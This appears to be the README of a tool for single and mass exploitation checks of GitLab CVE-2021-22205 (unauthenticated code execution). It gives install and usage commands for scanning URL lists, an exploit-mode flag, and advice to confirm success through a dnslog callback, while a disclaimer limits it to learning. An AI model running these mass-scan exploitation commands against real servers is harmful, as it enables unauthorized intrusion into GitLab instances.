
CVE-2021-22205未授权漏洞批量检测
Заявление: Данный проект предназначен только для обучения и обмена, не используйте для нелегального неавторизованного тестирования!
История обновлений
10.30
Добавлен пул прокси burp
Переписаны аргументы командной строки
Добавлена функция неавторизованного массового и одиночного обнаружения gitlab
Установка
pip3 install - r requirements.txt
Использование
usage: CVE-2021-22205.py [-h] [-w WAY] [-u URL] [-f FILE]
CVE-2021-22205
optional arguments:
-h, --help show this help message and exit
-w WAY, --way WAY Exploit way Forexample unauthorized or register new projects
-u URL, --url URL url like http://127.0.0.1:8080
-f FILE, --file FILE url file path
Обнаружение неавторизованной загрузки для одного url
python3 CVE-2021-22205.py -w un -u http://127.0.0.1
Массовое обнаружение неавторизованной загрузки
python3 CVE-2021-22205.py -w un -f ./url.txt
Небольшой пример
Эта уязвимость по умолчанию не выводит результат, введите команду, например, используя dnslog для проверки по данным

Вернитесь на dnslog для проверки, если есть ответ — успех

https://hackerone.com/reports/1154542
https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/